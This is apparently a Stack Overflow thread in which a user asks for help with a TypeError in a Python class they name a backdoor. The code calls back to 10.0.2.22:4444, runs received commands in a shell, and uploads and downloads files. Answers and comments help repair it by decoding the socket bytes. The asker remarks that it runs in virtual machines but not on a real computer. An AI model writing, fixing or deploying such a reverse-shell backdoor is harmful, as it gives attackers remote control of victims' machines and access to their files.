# whenever i run this it give me TypeError: can only concatenate str (not "bytes") to str and i don't know how to fix it?

Tags: python

```
    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue


    def execute_system_commmand(self,command):
        return subprocess.check_output(command,shell=True)


    def change_working_directory_to(self,path):
        os.chdir(path)
        return "[+] Change working directory to " + path

    def write_file(self,path,content):
        with open(path,"wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Upload Succesful"

    def read_file(self,path):
        with open(path,"rb") as file:
            return base64.b64encode(file.read())

    def run(self):
        while True:
            command = self.reliable_receive()

            try:
                if command[0] == "exit":
                    self.connection.close()
                    sys.exit()
                elif command[0] == "cd" and len(command) > 1:
                    command_result = self.change_working_directory_to(command[1])
                elif command[0] == "download":
                    command_result = self.read_file(command[1])
                elif command[0] == "upload":
                    command_result = self.write_file(command[1],command[2])

                else:
                    command_result = self.execute_system_commmand(command)

            except Exception:
                command_result = "[-]Error during command Execution"

            self.reliable_send(command_result)


my_backdoor = Backdoor("10.0.2.22",4444)
my_backdoor.run()
```

** whenever i run this it give me TypeError: can only concatenate str (not "bytes") to str and i don't know how to fix it ? but this same code run in my virtual machine.  I probably know that its silly mistake but didn't see that. Can you help me to fix this problem **

```
Traceback (most recent call last):
  File "backdoor.py", line 73, in <module>
    my_backdoor.run()
  File "backdoor.py", line 50, in run
    command = self.reliable_receive()
  File "backdoor.py", line 25, in reliable_receive
    json_data = json_data + self.connection.recv(1024)
TypeError: can only concatenate str (not "bytes") to str
```

Comment: receive returns bytes, not a string. You can cast it to string, then it should work

Comment: Welcome to stackoverflow, please read [how to create a minimal-reproducible-example](https://stackoverflow.com/help/minimal-reproducible-example) and edit your code so we can have enough context. Right now, there's no way to correctly know what `connection.recv` returns.

Comment: can you write that part of code to me, I didn't understand.

Comment: @DipanshuSendre My answer rewrites the line where that error occurs.

Answer (score 1, accepted):

When sending data in sockets the string is encoded str.encode().

So when you receive it, it is encoded in a bytes object and must run

```
bytes_object.decode(way_bytes_object_was_encoded)
```

In your case:

```
json_data = json_data + self.connection.recv(1024).decode(method_used_to_encode)
```

method_used_to_encode is usually

```
“utf-8”
```

Ensure that you do not have any variable named “str” in this scope.

PROBLEM: You initialised json_data as a string, then tried to add a serialized json string to it as if it were an actual string, which is not possible as a serialized object by json is a bytes-object.

SOLUTION:

```py
def reliable_receive(self):
        while True:
            try:
                json_data = self.connection.recv(1024)
                return json.loads(json_data)  # Deserializes object from json string received.
            except ValueError as e:
                print(e)  # Prints if there is an error? Not sure if you need this, but if there is a ValueError you will be stuck in an infinite loop of nothingness.
```

This should fix your issue.

Comment: @DipanshuSendre I edited my answer to make sure it works. `json_data = json_data + self.connection.recv(1024).decode(method_used_to_encode)` should work!

Comment: substitute `method_used_to_encode` with `'utf-8'` or if you know it, what you encode it with when sending the original message.

Comment: If you know where you encode the message, that you are receiving with `self.connection.recv(1024)` using `'utf-8'` is standard, however if your program needs to use something else specific, feel free to do so.

Comment: if i used `'utf-8'` it gives me `
TypeError: Object of type bytes is not JSON serializable`

Comment: Are you running `json_data = json_data + self.connection.recv(1024).decode('utf-8')` And if so what type of object are you sending through the socket, for example, 'String' or are you pickling data? Can you send the line of code that is sending the data through the sockets? `self.connection.send(str.encode(thing_you_are_sending))`?

Comment: @DipanshuSendre Here is a link to a stack overflow question answering that error: https://stackoverflow.com/questions/44682018/typeerror-object-of-type-bytes-is-not-json-serializable It is not the answer that is incorrect but somewhere in your code your relying on the json format to serialize your json.

Comment: @DipanshuSendre sure I'll see what I can do. Did my solution not work?

Comment: Yes your solution didn't work but I think if you see my code then you know the real problem.

Comment: Are you saying that your original code works on a virtual computer and not the machine your running it on?

Comment: Yes , I had run in win10 virtual machine

Comment: it works on all virtual machine that i had but it didnt work on real computer